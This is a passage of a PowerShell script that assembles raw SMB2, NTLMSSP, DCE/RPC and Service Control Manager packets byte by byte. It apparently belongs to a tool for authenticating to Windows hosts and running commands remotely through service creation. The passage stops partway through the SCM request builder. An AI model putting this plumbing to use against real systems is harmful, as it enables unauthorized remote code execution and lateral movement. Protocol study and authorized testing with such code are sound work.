277 |         $packet_SMB2Header.Add("SMB2Header_Signature",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00))
278 | 
279 |         return $packet_SMB2Header
280 |     }
281 | 
282 |     function Get-PacketSMB2NegotiateProtocolRequest()
283 |     {
284 |         $packet_SMB2NegotiateProtocolRequest = New-Object System.Collections.Specialized.OrderedDictionary
285 |         $packet_SMB2NegotiateProtocolRequest.Add("SMB2NegotiateProtocolRequest_StructureSize",[Byte[]](0x24,0x00))
286 |         $packet_SMB2NegotiateProtocolRequest.Add("SMB2NegotiateProtocolRequest_DialectCount",[Byte[]](0x02,0x00))
287 |         $packet_SMB2NegotiateProtocolRequest.Add("SMB2NegotiateProtocolRequest_SecurityMode",[Byte[]](0x01,0x00))
288 |         $packet_SMB2NegotiateProtocolRequest.Add("SMB2NegotiateProtocolRequest_Reserved",[Byte[]](0x00,0x00))
289 |         $packet_SMB2NegotiateProtocolRequest.Add("SMB2NegotiateProtocolRequest_Capabilities",[Byte[]](0x40,0x00,0x00,0x00))
290 |         $packet_SMB2NegotiateProtocolRequest.Add("SMB2NegotiateProtocolRequest_ClientGUID",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00))
291 |         $packet_SMB2NegotiateProtocolRequest.Add("SMB2NegotiateProtocolRequest_NegotiateContextOffset",[Byte[]](0x00,0x00,0x00,0x00))
292 |         $packet_SMB2NegotiateProtocolRequest.Add("SMB2NegotiateProtocolRequest_NegotiateContextCount",[Byte[]](0x00,0x00))
293 |         $packet_SMB2NegotiateProtocolRequest.Add("SMB2NegotiateProtocolRequest_Reserved2",[Byte[]](0x00,0x00))
294 |         $packet_SMB2NegotiateProtocolRequest.Add("SMB2NegotiateProtocolRequest_Dialect",[Byte[]](0x02,0x02))
295 |         $packet_SMB2NegotiateProtocolRequest.Add("SMB2NegotiateProtocolRequest_Dialect2",[Byte[]](0x10,0x02))
296 | 
297 |         return $packet_SMB2NegotiateProtocolRequest
298 |     }
299 | 
300 |     function Get-PacketSMB2SessionSetupRequest()
301 |     {
302 |         param([Byte[]]$packet_security_blob)
303 | 
304 |         [Byte[]]$packet_security_blob_length = [System.BitConverter]::GetBytes($packet_security_blob.Length)
305 |         $packet_security_blob_length = $packet_security_blob_length[0,1]
306 | 
307 |         $packet_SMB2SessionSetupRequest = New-Object System.Collections.Specialized.OrderedDictionary
308 |         $packet_SMB2SessionSetupRequest.Add("SMB2SessionSetupRequest_StructureSize",[Byte[]](0x19,0x00))
309 |         $packet_SMB2SessionSetupRequest.Add("SMB2SessionSetupRequest_Flags",[Byte[]](0x00))
310 |         $packet_SMB2SessionSetupRequest.Add("SMB2SessionSetupRequest_SecurityMode",[Byte[]](0x01))
311 |         $packet_SMB2SessionSetupRequest.Add("SMB2SessionSetupRequest_Capabilities",[Byte[]](0x00,0x00,0x00,0x00))
312 |         $packet_SMB2SessionSetupRequest.Add("SMB2SessionSetupRequest_Channel",[Byte[]](0x00,0x00,0x00,0x00))
313 |         $packet_SMB2SessionSetupRequest.Add("SMB2SessionSetupRequest_SecurityBufferOffset",[Byte[]](0x58,0x00))
314 |         $packet_SMB2SessionSetupRequest.Add("SMB2SessionSetupRequest_SecurityBufferLength",$packet_security_blob_length)
315 |         $packet_SMB2SessionSetupRequest.Add("SMB2SessionSetupRequest_PreviousSessionID",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00))
316 |         $packet_SMB2SessionSetupRequest.Add("SMB2SessionSetupRequest_Buffer",$packet_security_blob)
317 | 
318 |         return $packet_SMB2SessionSetupRequest 
319 |     }
320 | 
321 |     function Get-PacketSMB2TreeConnectRequest()
322 |     {
323 |         param([Byte[]]$packet_path)
324 | 
325 |         [Byte[]]$packet_path_length = [System.BitConverter]::GetBytes($packet_path.Length)
326 |         $packet_path_length = $packet_path_length[0,1]
327 | 
328 |         $packet_SMB2TreeConnectRequest = New-Object System.Collections.Specialized.OrderedDictionary
329 |         $packet_SMB2TreeConnectRequest.Add("SMB2TreeConnectRequest_StructureSize",[Byte[]](0x09,0x00))
330 |         $packet_SMB2TreeConnectRequest.Add("SMB2TreeConnectRequest_Reserved",[Byte[]](0x00,0x00))
331 |         $packet_SMB2TreeConnectRequest.Add("SMB2TreeConnectRequest_PathOffset",[Byte[]](0x48,0x00))
332 |         $packet_SMB2TreeConnectRequest.Add("SMB2TreeConnectRequest_PathLength",$packet_path_length)
333 |         $packet_SMB2TreeConnectRequest.Add("SMB2TreeConnectRequest_Buffer",$packet_path)
334 | 
335 |         return $packet_SMB2TreeConnectRequest
336 |     }
337 | 
338 |     function Get-PacketSMB2CreateRequestFile()
339 |     {
340 |         param([Byte[]]$packet_named_pipe)
341 | 
342 |         $packet_named_pipe_length = [System.BitConverter]::GetBytes($packet_named_pipe.Length)
343 |         $packet_named_pipe_length = $packet_named_pipe_length[0,1]
344 | 
345 |         $packet_SMB2CreateRequestFile = New-Object System.Collections.Specialized.OrderedDictionary
346 |         $packet_SMB2CreateRequestFile.Add("SMB2CreateRequestFile_StructureSize",[Byte[]](0x39,0x00))
347 |         $packet_SMB2CreateRequestFile.Add("SMB2CreateRequestFile_Flags",[Byte[]](0x00))
348 |         $packet_SMB2CreateRequestFile.Add("SMB2CreateRequestFile_RequestedOplockLevel",[Byte[]](0x00))
349 |         $packet_SMB2CreateRequestFile.Add("SMB2CreateRequestFile_Impersonation",[Byte[]](0x02,0x00,0x00,0x00))
350 |         $packet_SMB2CreateRequestFile.Add("SMB2CreateRequestFile_SMBCreateFlags",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00))
351 |         $packet_SMB2CreateRequestFile.Add("SMB2CreateRequestFile_Reserved",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00))
352 |         $packet_SMB2CreateRequestFile.Add("SMB2CreateRequestFile_DesiredAccess",[Byte[]](0x03,0x00,0x00,0x00))
353 |         $packet_SMB2CreateRequestFile.Add("SMB2CreateRequestFile_FileAttributes",[Byte[]](0x80,0x00,0x00,0x00))
354 |         $packet_SMB2CreateRequestFile.Add("SMB2CreateRequestFile_ShareAccess",[Byte[]](0x01,0x00,0x00,0x00))
355 |         $packet_SMB2CreateRequestFile.Add("SMB2CreateRequestFile_CreateDisposition",[Byte[]](0x01,0x00,0x00,0x00))
356 |         $packet_SMB2CreateRequestFile.Add("SMB2CreateRequestFile_CreateOptions",[Byte[]](0x40,0x00,0x00,0x00))
357 |         $packet_SMB2CreateRequestFile.Add("SMB2CreateRequestFile_NameOffset",[Byte[]](0x78,0x00))
358 |         $packet_SMB2CreateRequestFile.Add("SMB2CreateRequestFile_NameLength",$packet_named_pipe_length)
359 |         $packet_SMB2CreateRequestFile.Add("SMB2CreateRequestFile_CreateContextsOffset",[Byte[]](0x00,0x00,0x00,0x00))
360 |         $packet_SMB2CreateRequestFile.Add("SMB2CreateRequestFile_CreateContextsLength",[Byte[]](0x00,0x00,0x00,0x00))
361 |         $packet_SMB2CreateRequestFile.Add("SMB2CreateRequestFile_Buffer",$packet_named_pipe)
362 | 
363 |         return $packet_SMB2CreateRequestFile
364 |     }
365 | 
366 |     function Get-PacketSMB2ReadRequest()
367 |     {
368 |         param ([Byte[]]$packet_file_ID)
369 | 
370 |         $packet_SMB2ReadRequest = New-Object System.Collections.Specialized.OrderedDictionary
371 |         $packet_SMB2ReadRequest.Add("SMB2ReadRequest_StructureSize",[Byte[]](0x31,0x00))
372 |         $packet_SMB2ReadRequest.Add("SMB2ReadRequest_Padding",[Byte[]](0x50))
373 |         $packet_SMB2ReadRequest.Add("SMB2ReadRequest_Flags",[Byte[]](0x00))
374 |         $packet_SMB2ReadRequest.Add("SMB2ReadRequest_Length",[Byte[]](0x00,0x00,0x10,0x00))
375 |         $packet_SMB2ReadRequest.Add("SMB2ReadRequest_Offset",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00))
376 |         $packet_SMB2ReadRequest.Add("SMB2ReadRequest_FileID",$packet_file_ID)
377 |         $packet_SMB2ReadRequest.Add("SMB2ReadRequest_MinimumCount",[Byte[]](0x00,0x00,0x00,0x00))
378 |         $packet_SMB2ReadRequest.Add("SMB2ReadRequest_Channel",[Byte[]](0x00,0x00,0x00,0x00))
379 |         $packet_SMB2ReadRequest.Add("SMB2ReadRequest_RemainingBytes",[Byte[]](0x00,0x00,0x00,0x00))
380 |         $packet_SMB2ReadRequest.Add("SMB2ReadRequest_ReadChannelInfoOffset",[Byte[]](0x00,0x00))
381 |         $packet_SMB2ReadRequest.Add("SMB2ReadRequest_ReadChannelInfoLength",[Byte[]](0x00,0x00))
382 |         $packet_SMB2ReadRequest.Add("SMB2ReadRequest_Buffer",[Byte[]](0x30))
383 | 
384 |         return $packet_SMB2ReadRequest
385 |     }
386 | 
387 |     function Get-PacketSMB2WriteRequest()
388 |     {
389 |         param([Byte[]]$packet_file_ID,[Int]$packet_RPC_length)
390 | 
391 |         [Byte[]]$packet_write_length = [System.BitConverter]::GetBytes($packet_RPC_length)
392 | 
393 |         $packet_SMB2WriteRequest = New-Object System.Collections.Specialized.OrderedDictionary
394 |         $packet_SMB2WriteRequest.Add("SMB2WriteRequest_StructureSize",[Byte[]](0x31,0x00))
395 |         $packet_SMB2WriteRequest.Add("SMB2WriteRequest_DataOffset",[Byte[]](0x70,0x00))
396 |         $packet_SMB2WriteRequest.Add("SMB2WriteRequest_Length",$packet_write_length)
397 |         $packet_SMB2WriteRequest.Add("SMB2WriteRequest_Offset",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00))
398 |         $packet_SMB2WriteRequest.Add("SMB2WriteRequest_FileID",$packet_file_ID)
399 |         $packet_SMB2WriteRequest.Add("SMB2WriteRequest_Channel",[Byte[]](0x00,0x00,0x00,0x00))
400 |         $packet_SMB2WriteRequest.Add("SMB2WriteRequest_RemainingBytes",[Byte[]](0x00,0x00,0x00,0x00))
401 |         $packet_SMB2WriteRequest.Add("SMB2WriteRequest_WriteChannelInfoOffset",[Byte[]](0x00,0x00))
402 |         $packet_SMB2WriteRequest.Add("SMB2WriteRequest_WriteChannelInfoLength",[Byte[]](0x00,0x00))
403 |         $packet_SMB2WriteRequest.Add("SMB2WriteRequest_Flags",[Byte[]](0x00,0x00,0x00,0x00))
404 | 
405 |         return $packet_SMB2WriteRequest
406 |     }
407 | 
408 |     function Get-PacketSMB2CloseRequest()
409 |     {
410 |         param ([Byte[]]$packet_file_ID)
411 | 
412 |         $packet_SMB2CloseRequest = New-Object System.Collections.Specialized.OrderedDictionary
413 |         $packet_SMB2CloseRequest.Add("SMB2CloseRequest_StructureSize",[Byte[]](0x18,0x00))
414 |         $packet_SMB2CloseRequest.Add("SMB2CloseRequest_Flags",[Byte[]](0x00,0x00))
415 |         $packet_SMB2CloseRequest.Add("SMB2CloseRequest_Reserved",[Byte[]](0x00,0x00,0x00,0x00))
416 |         $packet_SMB2CloseRequest.Add("SMB2CloseRequest_FileID",$packet_file_ID)
417 | 
418 |         return $packet_SMB2CloseRequest
419 |     }
420 | 
421 |     function Get-PacketSMB2TreeDisconnectRequest()
422 |     {
423 |         $packet_SMB2TreeDisconnectRequest = New-Object System.Collections.Specialized.OrderedDictionary
424 |         $packet_SMB2TreeDisconnectRequest.Add("SMB2TreeDisconnectRequest_StructureSize",[Byte[]](0x04,0x00))
425 |         $packet_SMB2TreeDisconnectRequest.Add("SMB2TreeDisconnectRequest_Reserved",[Byte[]](0x00,0x00))
426 | 
427 |         return $packet_SMB2TreeDisconnectRequest
428 |     }
429 | 
430 |     function Get-PacketSMB2SessionLogoffRequest()
431 |     {
432 |         $packet_SMB2SessionLogoffRequest = New-Object System.Collections.Specialized.OrderedDictionary
433 |         $packet_SMB2SessionLogoffRequest.Add("SMB2SessionLogoffRequest_StructureSize",[Byte[]](0x04,0x00))
434 |         $packet_SMB2SessionLogoffRequest.Add("SMB2SessionLogoffRequest_Reserved",[Byte[]](0x00,0x00))
435 | 
436 |         return $packet_SMB2SessionLogoffRequest
437 |     }
438 | 
439 |     #NTLM
440 | 
441 |     function Get-PacketNTLMSSPNegotiate()
442 |     {
443 |         param([Byte[]]$packet_negotiate_flags,[Byte[]]$packet_version)
444 | 
445 |         [Byte[]]$packet_NTLMSSP_length = [System.BitConverter]::GetBytes(32 + $packet_version.Length)
446 |         $packet_NTLMSSP_length = $packet_NTLMSSP_length[0]
447 |         [Byte[]]$packet_ASN_length_1 = $packet_NTLMSSP_length[0] + 32
448 |         [Byte[]]$packet_ASN_length_2 = $packet_NTLMSSP_length[0] + 22
449 |         [Byte[]]$packet_ASN_length_3 = $packet_NTLMSSP_length[0] + 20
450 |         [Byte[]]$packet_ASN_length_4 = $packet_NTLMSSP_length[0] + 2
451 | 
452 |         $packet_NTLMSSPNegotiate = New-Object System.Collections.Specialized.OrderedDictionary
453 |         $packet_NTLMSSPNegotiate.Add("NTLMSSPNegotiate_InitialContextTokenID",[Byte[]](0x60)) # the ASN.1 key names are likely not all correct
454 |         $packet_NTLMSSPNegotiate.Add("NTLMSSPNegotiate_InitialcontextTokenLength",$packet_ASN_length_1)
455 |         $packet_NTLMSSPNegotiate.Add("NTLMSSPNegotiate_ThisMechID",[Byte[]](0x06))
456 |         $packet_NTLMSSPNegotiate.Add("NTLMSSPNegotiate_ThisMechLength",[Byte[]](0x06))
457 |         $packet_NTLMSSPNegotiate.Add("NTLMSSPNegotiate_OID",[Byte[]](0x2b,0x06,0x01,0x05,0x05,0x02))
458 |         $packet_NTLMSSPNegotiate.Add("NTLMSSPNegotiate_InnerContextTokenID",[Byte[]](0xa0))
459 |         $packet_NTLMSSPNegotiate.Add("NTLMSSPNegotiate_InnerContextTokenLength",$packet_ASN_length_2)
460 |         $packet_NTLMSSPNegotiate.Add("NTLMSSPNegotiate_InnerContextTokenID2",[Byte[]](0x30))
461 |         $packet_NTLMSSPNegotiate.Add("NTLMSSPNegotiate_InnerContextTokenLength2",$packet_ASN_length_3)
462 |         $packet_NTLMSSPNegotiate.Add("NTLMSSPNegotiate_MechTypesID",[Byte[]](0xa0))
463 |         $packet_NTLMSSPNegotiate.Add("NTLMSSPNegotiate_MechTypesLength",[Byte[]](0x0e))
464 |         $packet_NTLMSSPNegotiate.Add("NTLMSSPNegotiate_MechTypesID2",[Byte[]](0x30))
465 |         $packet_NTLMSSPNegotiate.Add("NTLMSSPNegotiate_MechTypesLength2",[Byte[]](0x0c))
466 |         $packet_NTLMSSPNegotiate.Add("NTLMSSPNegotiate_MechTypesID3",[Byte[]](0x06))
467 |         $packet_NTLMSSPNegotiate.Add("NTLMSSPNegotiate_MechTypesLength3",[Byte[]](0x0a))
468 |         $packet_NTLMSSPNegotiate.Add("NTLMSSPNegotiate_MechType",[Byte[]](0x2b,0x06,0x01,0x04,0x01,0x82,0x37,0x02,0x02,0x0a))
469 |         $packet_NTLMSSPNegotiate.Add("NTLMSSPNegotiate_MechTokenID",[Byte[]](0xa2))
470 |         $packet_NTLMSSPNegotiate.Add("NTLMSSPNegotiate_MechTokenLength",$packet_ASN_length_4)
471 |         $packet_NTLMSSPNegotiate.Add("NTLMSSPNegotiate_NTLMSSPID",[Byte[]](0x04))
472 |         $packet_NTLMSSPNegotiate.Add("NTLMSSPNegotiate_NTLMSSPLength",$packet_NTLMSSP_length)
473 |         $packet_NTLMSSPNegotiate.Add("NTLMSSPNegotiate_Identifier",[Byte[]](0x4e,0x54,0x4c,0x4d,0x53,0x53,0x50,0x00))
474 |         $packet_NTLMSSPNegotiate.Add("NTLMSSPNegotiate_MessageType",[Byte[]](0x01,0x00,0x00,0x00))
475 |         $packet_NTLMSSPNegotiate.Add("NTLMSSPNegotiate_NegotiateFlags",$packet_negotiate_flags)
476 |         $packet_NTLMSSPNegotiate.Add("NTLMSSPNegotiate_CallingWorkstationDomain",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00))
477 |         $packet_NTLMSSPNegotiate.Add("NTLMSSPNegotiate_CallingWorkstationName",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00))
478 | 
479 |         if($packet_version)
480 |         {
481 |             $packet_NTLMSSPNegotiate.Add("NTLMSSPNegotiate_Version",$packet_version)
482 |         }
483 | 
484 |         return $packet_NTLMSSPNegotiate
485 |     }
486 | 
487 |     function Get-PacketNTLMSSPAuth()
488 |     {
489 |         param([Byte[]]$packet_NTLM_response)
490 | 
491 |         [Byte[]]$packet_NTLMSSP_length = [System.BitConverter]::GetBytes($packet_NTLM_response.Length)
492 |         $packet_NTLMSSP_length = $packet_NTLMSSP_length[1,0]
493 |         [Byte[]]$packet_ASN_length_1 = [System.BitConverter]::GetBytes($packet_NTLM_response.Length + 12)
494 |         $packet_ASN_length_1 = $packet_ASN_length_1[1,0]
495 |         [Byte[]]$packet_ASN_length_2 = [System.BitConverter]::GetBytes($packet_NTLM_response.Length + 8)
496 |         $packet_ASN_length_2 = $packet_ASN_length_2[1,0]
497 |         [Byte[]]$packet_ASN_length_3 = [System.BitConverter]::GetBytes($packet_NTLM_response.Length + 4)
498 |         $packet_ASN_length_3 = $packet_ASN_length_3[1,0]
499 | 
500 |         $packet_NTLMSSPAuth = New-Object System.Collections.Specialized.OrderedDictionary
501 |         $packet_NTLMSSPAuth.Add("NTLMSSPAuth_ASNID",[Byte[]](0xa1,0x82))
502 |         $packet_NTLMSSPAuth.Add("NTLMSSPAuth_ASNLength",$packet_ASN_length_1)
503 |         $packet_NTLMSSPAuth.Add("NTLMSSPAuth_ASNID2",[Byte[]](0x30,0x82))
504 |         $packet_NTLMSSPAuth.Add("NTLMSSPAuth_ASNLength2",$packet_ASN_length_2)
505 |         $packet_NTLMSSPAuth.Add("NTLMSSPAuth_ASNID3",[Byte[]](0xa2,0x82))
506 |         $packet_NTLMSSPAuth.Add("NTLMSSPAuth_ASNLength3",$packet_ASN_length_3)
507 |         $packet_NTLMSSPAuth.Add("NTLMSSPAuth_NTLMSSPID",[Byte[]](0x04,0x82))
508 |         $packet_NTLMSSPAuth.Add("NTLMSSPAuth_NTLMSSPLength",$packet_NTLMSSP_length)
509 |         $packet_NTLMSSPAuth.Add("NTLMSSPAuth_NTLMResponse",$packet_NTLM_response)
510 | 
511 |         return $packet_NTLMSSPAuth
512 |     }
513 | 
514 |     #RPC
515 | 
516 |     function Get-PacketRPCBind()
517 |     {
518 |         param([Int]$packet_call_ID,[Byte[]]$packet_max_frag,[Byte[]]$packet_num_ctx_items,[Byte[]]$packet_context_ID,[Byte[]]$packet_UUID,[Byte[]]$packet_UUID_version)
519 | 
520 |         [Byte[]]$packet_call_ID_bytes = [System.BitConverter]::GetBytes($packet_call_ID)
521 | 
522 |         $packet_RPCBind = New-Object System.Collections.Specialized.OrderedDictionary
523 |         $packet_RPCBind.Add("RPCBind_Version",[Byte[]](0x05))
524 |         $packet_RPCBind.Add("RPCBind_VersionMinor",[Byte[]](0x00))
525 |         $packet_RPCBind.Add("RPCBind_PacketType",[Byte[]](0x0b))
526 |         $packet_RPCBind.Add("RPCBind_PacketFlags",[Byte[]](0x03))
527 |         $packet_RPCBind.Add("RPCBind_DataRepresentation",[Byte[]](0x10,0x00,0x00,0x00))
528 |         $packet_RPCBind.Add("RPCBind_FragLength",[Byte[]](0x48,0x00))
529 |         $packet_RPCBind.Add("RPCBind_AuthLength",[Byte[]](0x00,0x00))
530 |         $packet_RPCBind.Add("RPCBind_CallID",$packet_call_ID_bytes)
531 |         $packet_RPCBind.Add("RPCBind_MaxXmitFrag",[Byte[]](0xb8,0x10))
532 |         $packet_RPCBind.Add("RPCBind_MaxRecvFrag",[Byte[]](0xb8,0x10))
533 |         $packet_RPCBind.Add("RPCBind_AssocGroup",[Byte[]](0x00,0x00,0x00,0x00))
534 |         $packet_RPCBind.Add("RPCBind_NumCtxItems",$packet_num_ctx_items)
535 |         $packet_RPCBind.Add("RPCBind_Unknown",[Byte[]](0x00,0x00,0x00))
536 |         $packet_RPCBind.Add("RPCBind_ContextID",$packet_context_ID)
537 |         $packet_RPCBind.Add("RPCBind_NumTransItems",[Byte[]](0x01))
538 |         $packet_RPCBind.Add("RPCBind_Unknown2",[Byte[]](0x00))
539 |         $packet_RPCBind.Add("RPCBind_Interface",$packet_UUID)
540 |         $packet_RPCBind.Add("RPCBind_InterfaceVer",$packet_UUID_version)
541 |         $packet_RPCBind.Add("RPCBind_InterfaceVerMinor",[Byte[]](0x00,0x00))
542 |         $packet_RPCBind.Add("RPCBind_TransferSyntax",[Byte[]](0x04,0x5d,0x88,0x8a,0xeb,0x1c,0xc9,0x11,0x9f,0xe8,0x08,0x00,0x2b,0x10,0x48,0x60))
543 |         $packet_RPCBind.Add("RPCBind_TransferSyntaxVer",[Byte[]](0x02,0x00,0x00,0x00))
544 | 
545 |         if($packet_num_ctx_items[0] -eq 2)
546 |         {
547 |             $packet_RPCBind.Add("RPCBind_ContextID2",[Byte[]](0x01,0x00))
548 |             $packet_RPCBind.Add("RPCBind_NumTransItems2",[Byte[]](0x01))
549 |             $packet_RPCBind.Add("RPCBind_Unknown3",[Byte[]](0x00))
550 |             $packet_RPCBind.Add("RPCBind_Interface2",[Byte[]](0xc4,0xfe,0xfc,0x99,0x60,0x52,0x1b,0x10,0xbb,0xcb,0x00,0xaa,0x00,0x21,0x34,0x7a))
551 |             $packet_RPCBind.Add("RPCBind_InterfaceVer2",[Byte[]](0x00,0x00))
552 |             $packet_RPCBind.Add("RPCBind_InterfaceVerMinor2",[Byte[]](0x00,0x00))
553 |             $packet_RPCBind.Add("RPCBind_TransferSyntax2",[Byte[]](0x2c,0x1c,0xb7,0x6c,0x12,0x98,0x40,0x45,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0x00))
554 |             $packet_RPCBind.Add("RPCBind_TransferSyntaxVer2",[Byte[]](0x01,0x00,0x00,0x00))
555 |         }
556 |         elseif($packet_num_ctx_items[0] -eq 3)
557 |         {
558 |             $packet_RPCBind.Add("RPCBind_ContextID2",[Byte[]](0x01,0x00))
559 |             $packet_RPCBind.Add("RPCBind_NumTransItems2",[Byte[]](0x01))
560 |             $packet_RPCBind.Add("RPCBind_Unknown3",[Byte[]](0x00))
561 |             $packet_RPCBind.Add("RPCBind_Interface2",[Byte[]](0x43,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xc0,0x00,0x00,0x00,0x00,0x00,0x00,0x46))
562 |             $packet_RPCBind.Add("RPCBind_InterfaceVer2",[Byte[]](0x00,0x00))
563 |             $packet_RPCBind.Add("RPCBind_InterfaceVerMinor2",[Byte[]](0x00,0x00))
564 |             $packet_RPCBind.Add("RPCBind_TransferSyntax2",[Byte[]](0x33,0x05,0x71,0x71,0xba,0xbe,0x37,0x49,0x83,0x19,0xb5,0xdb,0xef,0x9c,0xcc,0x36))
565 |             $packet_RPCBind.Add("RPCBind_TransferSyntaxVer2",[Byte[]](0x01,0x00,0x00,0x00))
566 |             $packet_RPCBind.Add("RPCBind_ContextID3",[Byte[]](0x02,0x00))
567 |             $packet_RPCBind.Add("RPCBind_NumTransItems3",[Byte[]](0x01))
568 |             $packet_RPCBind.Add("RPCBind_Unknown4",[Byte[]](0x00))
569 |             $packet_RPCBind.Add("RPCBind_Interface3",[Byte[]](0x43,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xc0,0x00,0x00,0x00,0x00,0x00,0x00,0x46))
570 |             $packet_RPCBind.Add("RPCBind_InterfaceVer3",[Byte[]](0x00,0x00))
571 |             $packet_RPCBind.Add("RPCBind_InterfaceVerMinor3",[Byte[]](0x00,0x00))
572 |             $packet_RPCBind.Add("RPCBind_TransferSyntax3",[Byte[]](0x2c,0x1c,0xb7,0x6c,0x12,0x98,0x40,0x45,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0x00))
573 |             $packet_RPCBind.Add("RPCBind_TransferSyntaxVer3",[Byte[]](0x01,0x00,0x00,0x00))
574 |             $packet_RPCBind.Add("RPCBind_AuthType",[Byte[]](0x0a))
575 |             $packet_RPCBind.Add("RPCBind_AuthLevel",[Byte[]](0x04))
576 |             $packet_RPCBind.Add("RPCBind_AuthPadLength",[Byte[]](0x00))
577 |             $packet_RPCBind.Add("RPCBind_AuthReserved",[Byte[]](0x00))
578 |             $packet_RPCBind.Add("RPCBind_ContextID4",[Byte[]](0x00,0x00,0x00,0x00))
579 |             $packet_RPCBind.Add("RPCBind_Identifier",[Byte[]](0x4e,0x54,0x4c,0x4d,0x53,0x53,0x50,0x00))
580 |             $packet_RPCBind.Add("RPCBind_MessageType",[Byte[]](0x01,0x00,0x00,0x00))
581 |             $packet_RPCBind.Add("RPCBind_NegotiateFlags",[Byte[]](0x97,0x82,0x08,0xe2))
582 |             $packet_RPCBind.Add("RPCBind_CallingWorkstationDomain",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00))
583 |             $packet_RPCBind.Add("RPCBind_CallingWorkstationName",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00))
584 |             $packet_RPCBind.Add("RPCBind_OSVersion",[Byte[]](0x06,0x01,0xb1,0x1d,0x00,0x00,0x00,0x0f))
585 |         }
586 | 
587 |         if($packet_call_ID -eq 3)
588 |         {
589 |             $packet_RPCBind.Add("RPCBind_AuthType",[Byte[]](0x0a))
590 |             $packet_RPCBind.Add("RPCBind_AuthLevel",[Byte[]](0x02))
591 |             $packet_RPCBind.Add("RPCBind_AuthPadLength",[Byte[]](0x00))
592 |             $packet_RPCBind.Add("RPCBind_AuthReserved",[Byte[]](0x00))
593 |             $packet_RPCBind.Add("RPCBind_ContextID3",[Byte[]](0x00,0x00,0x00,0x00))
594 |             $packet_RPCBind.Add("RPCBind_Identifier",[Byte[]](0x4e,0x54,0x4c,0x4d,0x53,0x53,0x50,0x00))
595 |             $packet_RPCBind.Add("RPCBind_MessageType",[Byte[]](0x01,0x00,0x00,0x00))
596 |             $packet_RPCBind.Add("RPCBind_NegotiateFlags",[Byte[]](0x97,0x82,0x08,0xe2))
597 |             $packet_RPCBind.Add("RPCBind_CallingWorkstationDomain",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00))
598 |             $packet_RPCBind.Add("RPCBind_CallingWorkstationName",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00))
599 |             $packet_RPCBind.Add("RPCBind_OSVersion",[Byte[]](0x06,0x01,0xb1,0x1d,0x00,0x00,0x00,0x0f))
600 |         }
601 | 
602 |         return $packet_RPCBind
603 |     }
604 | 
605 |     function Get-PacketRPCRequest()
606 |     {
607 |         param([Byte[]]$packet_flags,[Int]$packet_service_length,[Int]$packet_auth_length,[Int]$packet_auth_padding,[Byte[]]$packet_call_ID,[Byte[]]$packet_context_ID,[Byte[]]$packet_opnum,[Byte[]]$packet_data)
608 | 
609 |         if($packet_auth_length -gt 0)
610 |         {
611 |             $packet_full_auth_length = $packet_auth_length + $packet_auth_padding + 8
612 |         }
613 | 
614 |         [Byte[]]$packet_write_length = [System.BitConverter]::GetBytes($packet_service_length + 24 + $packet_full_auth_length + $packet_data.Length)
615 |         [Byte[]]$packet_frag_length = $packet_write_length[0,1]
616 |         [Byte[]]$packet_alloc_hint = [System.BitConverter]::GetBytes($packet_service_length + $packet_data.Length)
617 |         [Byte[]]$packet_auth_length = [System.BitConverter]::GetBytes($packet_auth_length)
618 |         $packet_auth_length = $packet_auth_length[0,1]
619 | 
620 |         $packet_RPCRequest = New-Object System.Collections.Specialized.OrderedDictionary
621 |         $packet_RPCRequest.Add("RPCRequest_Version",[Byte[]](0x05))
622 |         $packet_RPCRequest.Add("RPCRequest_VersionMinor",[Byte[]](0x00))
623 |         $packet_RPCRequest.Add("RPCRequest_PacketType",[Byte[]](0x00))
624 |         $packet_RPCRequest.Add("RPCRequest_PacketFlags",$packet_flags)
625 |         $packet_RPCRequest.Add("RPCRequest_DataRepresentation",[Byte[]](0x10,0x00,0x00,0x00))
626 |         $packet_RPCRequest.Add("RPCRequest_FragLength",$packet_frag_length)
627 |         $packet_RPCRequest.Add("RPCRequest_AuthLength",$packet_auth_length)
628 |         $packet_RPCRequest.Add("RPCRequest_CallID",$packet_call_ID)
629 |         $packet_RPCRequest.Add("RPCRequest_AllocHint",$packet_alloc_hint)
630 |         $packet_RPCRequest.Add("RPCRequest_ContextID",$packet_context_ID)
631 |         $packet_RPCRequest.Add("RPCRequest_Opnum",$packet_opnum)
632 | 
633 |         if($packet_data.Length)
634 |         {
635 |             $packet_RPCRequest.Add("RPCRequest_Data",$packet_data)
636 |         }
637 | 
638 |         return $packet_RPCRequest
639 |     }
640 | 
641 |     #SCM
642 | 
643 |     function Get-PacketSCMOpenSCManagerW()
644 |     {
645 |         param ([Byte[]]$packet_service,[Byte[]]$packet_service_length)
646 | 
647 |         [Byte[]]$packet_write_length = [System.BitConverter]::GetBytes($packet_service.Length + 92)
648 |         [Byte[]]$packet_frag_length = $packet_write_length[0,1]
649 |         [Byte[]]$packet_alloc_hint = [System.BitConverter]::GetBytes($packet_service.Length + 68)
650 |         $packet_referent_ID1 = [String](1..2 | ForEach-Object {"{0:X2}" -f (Get-Random -Minimum 1 -Maximum 255)})
651 |         $packet_referent_ID1 = $packet_referent_ID1.Split(" ") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
652 |         $packet_referent_ID1 += 0x00,0x00
653 |         $packet_referent_ID2 = [String](1..2 | ForEach-Object {"{0:X2}" -f (Get-Random -Minimum 1 -Maximum 255)})
654 |         $packet_referent_ID2 = $packet_referent_ID2.Split(" ") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
